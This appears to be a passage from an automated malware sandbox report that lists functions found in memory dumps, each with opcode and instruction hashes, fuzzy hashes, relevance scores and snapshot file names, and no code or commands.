                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: b40e4b811285e3da8d18dbae60b53563bfe6e6d86982e23112c461ff59dcfd43
                                                                                  • Instruction ID: c937f66dfc2e699c0c5a2c8147a762b10f5179b8fd713b3f997c38cd33d40c6c
                                                                                  • Opcode Fuzzy Hash: b40e4b811285e3da8d18dbae60b53563bfe6e6d86982e23112c461ff59dcfd43
                                                                                  • Instruction Fuzzy Hash: B841AB31B002099FDB58EB6598106BE77B3ABD9300B24C93BE5079B398EB35DD42C791
                                                                                  Function 00AD0DE0 Relevance: .1, Instructions: 109COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2156395871.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_ad0000_________.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: e47b717f53ce311fc4676f1b4630ffd6a76c78145179bfef1c7d0cc7f9c5cf7d
                                                                                  • Instruction ID: fde2d600bad755aebb0d9446165083f5fd9418e0daa1ab73c9bd25d04f0e33b4
                                                                                  • Opcode Fuzzy Hash: e47b717f53ce311fc4676f1b4630ffd6a76c78145179bfef1c7d0cc7f9c5cf7d
                                                                                  • Instruction Fuzzy Hash: 34416D31E002189FCB14DBA9D554BADBBF2EF88710F25806AE406EB341DB319D42CB95
                                                                                  Function 00AD09E0 Relevance: .1, Instructions: 105COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2156395871.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_ad0000_________.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 1854b5d52aa322d1639fe025eda76631491213d35d02bba60a867275e9d56c42
                                                                                  • Instruction ID: 71187372e239fd7cf7794b8f677a2eb85903481d4f366de7370bd04379acef8d
                                                                                  • Opcode Fuzzy Hash: 1854b5d52aa322d1639fe025eda76631491213d35d02bba60a867275e9d56c42
                                                                                  • Instruction Fuzzy Hash: 2D41B131E0424A8FCB00DFB9C8449EEFBB1EF89310F25819AE505EB2A1D734A945CB91
                                                                                  Function 00C09680 Relevance: .1, Instructions: 101COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2157101594.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_c00000_________.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 84d0edce3d688e4d658b89ab7f51cacc8c0561e9343bc2ce4bd2558d03b966cb
                                                                                  • Instruction ID: 3be99d95a26160615d7f3cfa0f7243b9f2398039b2b4c9406b3fc362204fc1b8
                                                                                  • Opcode Fuzzy Hash: 84d0edce3d688e4d658b89ab7f51cacc8c0561e9343bc2ce4bd2558d03b966cb
                                                                                  • Instruction Fuzzy Hash: 6B413370A05228CBDB20CF5ACD54BEDBBF9FB89304F1091A9E00EA7285D7755A85CF40
                                                                                  Function 00C09819 Relevance: .1, Instructions: 100COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2157101594.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_c00000_________.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 3a00685942717395c9a928d8d013ad8127e25d63c7195d2181254b8e52d63dc0
                                                                                  • Instruction ID: 7af7c45230167d7751df54630568e80e57137642218e524f52166e06b2575d37
                                                                                  • Opcode Fuzzy Hash: 3a00685942717395c9a928d8d013ad8127e25d63c7195d2181254b8e52d63dc0
                                                                                  • Instruction Fuzzy Hash: A341CE75A01228CFDB60DF19CD90BE9B7B5FB49304F1091EAE50DA7295E731AA85CF40
                                                                                  Function 00C09D29 Relevance: .1, Instructions: 99COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2157101594.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_c00000_________.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: d4916c99c828d8b9d4fb58636fb6ab4e53642edf4ae39120a8438adfdfc29ea6
                                                                                  • Instruction ID: 3da69127426145797fe3592e33fc165caa71c1846b907f3e4ab234d22da02cf5
                                                                                  • Opcode Fuzzy Hash: d4916c99c828d8b9d4fb58636fb6ab4e53642edf4ae39120a8438adfdfc29ea6
                                                                                  • Instruction Fuzzy Hash: EC41BC70A052288FDB64DF28CD94BE9B7B6FB49304F5091EAE50DA7295D735AA84CF00
                                                                                  Function 00AD0B8F Relevance: .1, Instructions: 97COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2156395871.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_ad0000_________.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 351e62618460e27074d5b9627907b0f26c6eb31c2ff65b59b4ed3d717a82acdc
                                                                                  • Instruction ID: 4aa4bf327dab1215a7b0150a26bac823e00b12fcd432f836c5a7963e8a736883
                                                                                  • Opcode Fuzzy Hash: 351e62618460e27074d5b9627907b0f26c6eb31c2ff65b59b4ed3d717a82acdc
                                                                                  • Instruction Fuzzy Hash: A4312731A0820ADFCB10DFA5D840DEEBBB5EF85350F24465AE406A3690DB315D49CB90
                                                                                  Function 00C09EC5 Relevance: .1, Instructions: 97COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2157101594.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_c00000_________.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 2952908e6bfec93f13c43cdd284a230c593d67295019ed136227b3175766f52b
                                                                                  • Instruction ID: 4ac9eaf34029b00da96c69575e9ef1415ddf8d68a4f6edf1061a3c6730ee4ddd
                                                                                  • Opcode Fuzzy Hash: 2952908e6bfec93f13c43cdd284a230c593d67295019ed136227b3175766f52b
                                                                                  • Instruction Fuzzy Hash: DE41BC70A012288FDB60DF19CD90BE9B7F6FB49304F1091EAE50DA7295DB31AA85CF40
                                                                                  Function 00C0A002 Relevance: .1, Instructions: 96COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2157101594.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_c00000_________.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 508420e184c718baaa0bdc10c6d8b867a11752a7f58eb88b01cf5d9a7ec2dd99
                                                                                  • Instruction ID: b87cc50e9b74c13080d79cfb392a2911dfa066432fca59b08a3925c939c4ba04
                                                                                  • Opcode Fuzzy Hash: 508420e184c718baaa0bdc10c6d8b867a11752a7f58eb88b01cf5d9a7ec2dd99
                                                                                  • Instruction Fuzzy Hash: AA41EF70A06228CFDB21CF18CD94BD9B7F5FB49304F1091EAE509A7296D7359A85CF00
                                                                                  Function 00AD1F29 Relevance: .1, Instructions: 95COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2156395871.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_ad0000_________.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: beaa2a94585ab5a92979674934638b88ff64b4411412719439f04e044e8b19bd
                                                                                  • Instruction ID: b17031b77200c84e20d05441bc32b12b720e763661ae857a2be3e8256793fb0f
                                                                                  • Opcode Fuzzy Hash: beaa2a94585ab5a92979674934638b88ff64b4411412719439f04e044e8b19bd
                                                                                  • Instruction Fuzzy Hash: A6218D35B102049FDB18EB25955077A37B2ABA9301F24887BD9079B398DB34DD02CB91
                                                                                  Function 00C09761 Relevance: .1, Instructions: 95COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2157101594.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_c00000_________.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: a6cc6d274e00843b1b754b5f3a175906acede3ff01d4f5f5c138a8ebc5e234c3
                                                                                  • Instruction ID: 572b18955adbdf2edd7a9699e295697da4bc34f7405177a9f1d7c4cedbfa0336
                                                                                  • Opcode Fuzzy Hash: a6cc6d274e00843b1b754b5f3a175906acede3ff01d4f5f5c138a8ebc5e234c3
                                                                                  • Instruction Fuzzy Hash: CF41CD75A01228CFDB60DF19CD90BE9B7B6FB49304F1091EAE50EA7291D735AA85CF10
                                                                                  Function 00C0174B Relevance: .1, Instructions: 92COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2157101594.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_c00000_________.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 9a56d6dd9422c0a09bd420f4d09d76251446495056418932c7cca0be01b9049f
                                                                                  • Instruction ID: a9a7632dfb98d86ee7dd25c3404de04a95932ed6b8854979a95c3a62c9b6fcb6
                                                                                  • Opcode Fuzzy Hash: 9a56d6dd9422c0a09bd420f4d09d76251446495056418932c7cca0be01b9049f
                                                                                  • Instruction Fuzzy Hash: 5741E974A05218CFDB94DF28D864BAA77B2FB49300F5092E9D50EA7359CB709E81CF41
                                                                                  Function 00AD2250 Relevance: .1, Instructions: 91COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2156395871.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_ad0000_________.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 0caeba1abbc6da3c2f0e1484ec05605b02d62ee6a18f455610c0b73c5269d577
                                                                                  • Instruction ID: e30e5c5166eec508a4e0ae3215af4df045786624fa43a32917047a7425cf0a22
                                                                                  • Opcode Fuzzy Hash: 0caeba1abbc6da3c2f0e1484ec05605b02d62ee6a18f455610c0b73c5269d577
                                                                                  • Instruction Fuzzy Hash: 9B21E0313083419EE7208BA99D443EA7BE4EBB5364F14493BF443C6780E664DC85D761
                                                                                  Function 00C09F81 Relevance: .1, Instructions: 90COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2157101594.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_c00000_________.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: b3df3cac314d6e309e55fbebbb908e431ec884bd7f351bb330adca9542b93713
                                                                                  • Instruction ID: 839f28b095a7879e1f86402d8e6b79f6ba755823953fbd5db5d61395c8d8422f
                                                                                  • Opcode Fuzzy Hash: b3df3cac314d6e309e55fbebbb908e431ec884bd7f351bb330adca9542b93713
                                                                                  • Instruction Fuzzy Hash: E941DD70A05228CFDB60CF19CC90BE9B7B6FB49304F1091EAE50EA7295E7319A85CF10
                                                                                  Function 00C09743 Relevance: .1, Instructions: 90COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2157101594.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_c00000_________.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 1d60b2a87d951b6148a6219bf647b08ed57ef0add2c86421118b917f212ffcb4
                                                                                  • Instruction ID: bf0c2082525655e38d252a127615323a513aa19151e6b2238226b09152e2f4aa
                                                                                  • Opcode Fuzzy Hash: 1d60b2a87d951b6148a6219bf647b08ed57ef0add2c86421118b917f212ffcb4
                                                                                  • Instruction Fuzzy Hash: 67310274A05258CFDB21CF19CD50BE9BBB5FB4A304F1091AAE50EA7292D7359A89CF10
                                                                                  Function 00AD0CA8 Relevance: .1, Instructions: 89COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2156395871.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_ad0000_________.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: e23a98eef6f29528d43b8a0c4ef357c96c96703ab26effd8adac569f324f4317
                                                                                  • Instruction ID: 97c05462f27b3fc76cacd501dc23cfd52f5265de9338811ed76a640b8ea42390
                                                                                  • Opcode Fuzzy Hash: e23a98eef6f29528d43b8a0c4ef357c96c96703ab26effd8adac569f324f4317
                                                                                  • Instruction Fuzzy Hash: 5131E272B041089FCB00DFB9C840A9EFBF2AF89310F2481ABD846A7355DB31AD45CB91
                                                                                  Function 00C09A9B Relevance: .1, Instructions: 87COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2157101594.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_c00000_________.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: f9e1fbb51738fe6d6c49b5a2928b4dbc8b166fa194bc88def6075ccd7cdd1647
                                                                                  • Instruction ID: 79fe4fd01d1c10dbb9fa6fbeeda3eafd78f7fb282bf836473a2e83972d8f9d93
                                                                                  • Opcode Fuzzy Hash: f9e1fbb51738fe6d6c49b5a2928b4dbc8b166fa194bc88def6075ccd7cdd1647
                                                                                  • Instruction Fuzzy Hash: FE41DF70A06228CFDB60CF59CD90BE9BBF5FB49304F1091AAE50DA7295D7359A84CF10
                                                                                  Function 00C09B67 Relevance: .1, Instructions: 85COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2157101594.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_c00000_________.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: c771bc8c309ba686c2cbe7de707d9e161500a816c43f3757e8ddc14f566e4a4e
                                                                                  • Instruction ID: 98b3ac670386fcb9c332538ca157ef551814afcb82b56b5dceb6eb10f5a2a8b1
                                                                                  • Opcode Fuzzy Hash: c771bc8c309ba686c2cbe7de707d9e161500a816c43f3757e8ddc14f566e4a4e
                                                                                  • Instruction Fuzzy Hash: C341DF71A05228CFDB20CF59CD90BE9B7F5FB49304F1095AAE50DA7291D775AA85CF00
                                                                                  Function 00AD6630 Relevance: .1, Instructions: 83COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2156395871.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_ad0000_________.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 772e41994d5dca922291a7499d079856f85df8aec73cadde72eaf0b280ddc7c6
                                                                                  • Instruction ID: e685af99fe34f7be63c6468ffd1a28cda49fa75d649bd9a5c298d1e27cced1f3
                                                                                  • Opcode Fuzzy Hash: 772e41994d5dca922291a7499d079856f85df8aec73cadde72eaf0b280ddc7c6
                                                                                  • Instruction Fuzzy Hash: AD3113B0D012599FDB14CFA9C584AEEBFF5AF48350F24842AE909AB350DB749945CBA0
                                                                                  Function 00C0138D Relevance: .1, Instructions: 83COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2157101594.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_c00000_________.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 954fe0a3e831eca8540975f696a6e11834ac6b337e28899a0c1976b08e2fc93b
                                                                                  • Instruction ID: e15521986d7f165d54c5f4d32470568cdf69c8b1b3c9ff67844fd8a88efa6bc2
                                                                                  • Opcode Fuzzy Hash: 954fe0a3e831eca8540975f696a6e11834ac6b337e28899a0c1976b08e2fc93b
                                                                                  • Instruction Fuzzy Hash: D9410270A05228CFDB65DF24D9A8BA9B7B2FB49300F5051EAE90DA7694CB705F80CF40
                                                                                  Function 00C09AE5 Relevance: .1, Instructions: 82COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2157101594.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_c00000_________.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 25a4a62893420a91be50c15c857d3bc3b1b5168e4324ce9838e88f2dac5a043c
                                                                                  • Instruction ID: f8373debe75b02a8ef712ca7dfdb82d9bcfdfea27eadc06ffce07ec42200f8ac
                                                                                  • Opcode Fuzzy Hash: 25a4a62893420a91be50c15c857d3bc3b1b5168e4324ce9838e88f2dac5a043c
                                                                                  • Instruction Fuzzy Hash: 7331BF70A062288BDB64CF19CD90BE9B7F6FB89304F1091E9E50DA7295D7359A85CF00
                                                                                  Function 00C09C1A Relevance: .1, Instructions: 82COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2157101594.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_c00000_________.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 32f4f1d9254158581f94683c39473947b3d5340353be05b6033a7a857883d7c5
                                                                                  • Instruction ID: 0dc89c2ceb0128121c32b4aa8f72b94d66c0220c0e37ee78e349a11bf463344e
                                                                                  • Opcode Fuzzy Hash: 32f4f1d9254158581f94683c39473947b3d5340353be05b6033a7a857883d7c5
                                                                                  • Instruction Fuzzy Hash: B131BC70A06228CBEB20CF19CD94BE9B7F6FB49304F1091A9E50EA7295D7759A84CF00
                                                                                  Function 00AD1428 Relevance: .1, Instructions: 81COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2156395871.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_ad0000_________.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 68df97f2973d673100373723aae14a65f239480956af966870ab149f51df8c23
                                                                                  • Instruction ID: 93721d058d69c9e7f36ff94d2edcf0994442d9b69a8440a73fecb256961f64a1
                                                                                  • Opcode Fuzzy Hash: 68df97f2973d673100373723aae14a65f239480956af966870ab149f51df8c23
                                                                                  • Instruction Fuzzy Hash: F22148B16083869FDB15DBA4C4501AEBBB2EFC630975484BFC08A8B757EA315842C392
                                                                                  Function 00C0A248 Relevance: .1, Instructions: 80COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2157101594.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_c00000_________.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 60e5a47df415f1e00b483dc9312b790da9ee05115bfcfd7bc4dc376dbb341cd1
                                                                                  • Instruction ID: 1a75868a875346f985f57cde9f352f3476633149581c352ccbea57f4f004f6f0
                                                                                  • Opcode Fuzzy Hash: 60e5a47df415f1e00b483dc9312b790da9ee05115bfcfd7bc4dc376dbb341cd1
                                                                                  • Instruction Fuzzy Hash: DD317A70C05348EFDB14CFA6D848BEDBFF5AB49304F04C0AAE808A6290C7764A45DF92
                                                                                  Function 00C09B21 Relevance: .1, Instructions: 80COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2157101594.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_c00000_________.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 07b700619ce39b3d450cb66ca7dff5f57de410ef4a9b4df2169ad36cea20439f
                                                                                  • Instruction ID: ce91f407c35212471600496403f87e4d5e12bf5a8f483b6ffe1fc8dd81e08a02
                                                                                  • Opcode Fuzzy Hash: 07b700619ce39b3d450cb66ca7dff5f57de410ef4a9b4df2169ad36cea20439f
                                                                                  • Instruction Fuzzy Hash: 1431AC70A06228CFDB60CF59CD94BE9B7F5FB49304F1091EAE509A7295D7759A84CF00
                                                                                  Function 00AD1CB0 Relevance: .1, Instructions: 79COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2156395871.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_ad0000_________.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 242a1f8d68968cfb75ac957f58caef15c4849f0f1cee904e549ae08aca6ae869
                                                                                  • Instruction ID: 91be8e3ed0311d29a138a379d1ab3deba4f4f77742d5254d5e79240b6a74a51f
                                                                                  • Opcode Fuzzy Hash: 242a1f8d68968cfb75ac957f58caef15c4849f0f1cee904e549ae08aca6ae869
                                                                                  • Instruction Fuzzy Hash: 8F31F774B00114DFDB18DFA9D998BADBBB2BF48705F10446AE906DB3A1DB749C42CB50
                                                                                  Function 00AD0BA0 Relevance: .1, Instructions: 78COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2156395871.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_ad0000_________.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: d7eb45e347bed9cda626827a164d2fe1fcad0a43e57f162e4bac29d15b86ce40
                                                                                  • Instruction ID: 00974765f35501a7a0b1b837492e2cd2b299dc3efa51a43a60e853c13890cf96
                                                                                  • Opcode Fuzzy Hash: d7eb45e347bed9cda626827a164d2fe1fcad0a43e57f162e4bac29d15b86ce40
                                                                                  • Instruction Fuzzy Hash: 4121D371A042449FDB20DF79C844A9EBBF1FF88350F204A6AE486D7351DB31AC45CB60
                                                                                  Function 00C09BE4 Relevance: .1, Instructions: 78COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2157101594.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_c00000_________.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 657c1f56b9c9d43503ab8a0e015e04dda34db9dba4a03a5e62c151dc845aa246
                                                                                  • Instruction ID: 406b3554de52aa8c5dca44980c9d41b98e6fd8f742690463773963e8324bc6fb
                                                                                  • Opcode Fuzzy Hash: 657c1f56b9c9d43503ab8a0e015e04dda34db9dba4a03a5e62c151dc845aa246
                                                                                  • Instruction Fuzzy Hash: 4B31BC70A06228CFDB24CF19CD94BE9B7F5FB49304F1091EAE50AA7295E7759A84CF00
                                                                                  Function 00C0A717 Relevance: .1, Instructions: 78COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2157101594.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_c00000_________.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 6c1c9656eb484ecc5c890cc3c1141ce064c8a7fe413f94e249e9f71de1fc8c3f
                                                                                  • Instruction ID: e7278313a56a5930ecc217850cfc5ed4ba4a27172e5c1b0315d1e773f1ebbdd2
                                                                                  • Opcode Fuzzy Hash: 6c1c9656eb484ecc5c890cc3c1141ce064c8a7fe413f94e249e9f71de1fc8c3f
                                                                                  • Instruction Fuzzy Hash: 4831BE70A05308DFDB14DF99E944BADB7F2AB05305F60A0AAD409AB2A5D3749E85DF02
                                                                                  Function 00ADDD28 Relevance: .1, Instructions: 76COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2156395871.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_ad0000_________.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 29e8f1a20e7a176849cb079d65c5b9c6160d2fdb231e5eada46444fcb6d9d7c5
                                                                                  • Instruction ID: a5978c78803367d6d382e3e85840d213b055374f87aed28a9bfcb24793abce8e
                                                                                  • Opcode Fuzzy Hash: 29e8f1a20e7a176849cb079d65c5b9c6160d2fdb231e5eada46444fcb6d9d7c5
                                                                                  • Instruction Fuzzy Hash: DD3123B0D02208DFDB04EFA9D4587ADBBF2EB89300F60D1AAD01AA7358D7744A85DB51
                                                                                  Function 00C08AB4 Relevance: .1, Instructions: 76COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2157101594.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_c00000_________.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 70dddfc19e12cf53100dde07bed9ff8f348afde47c3304d047518637506d3a8d
                                                                                  • Instruction ID: 2e0b0c8e32f398da0299fc1134fffc07e68eabf6a444762cfaf6451c0fcf0128
                                                                                  • Opcode Fuzzy Hash: 70dddfc19e12cf53100dde07bed9ff8f348afde47c3304d047518637506d3a8d
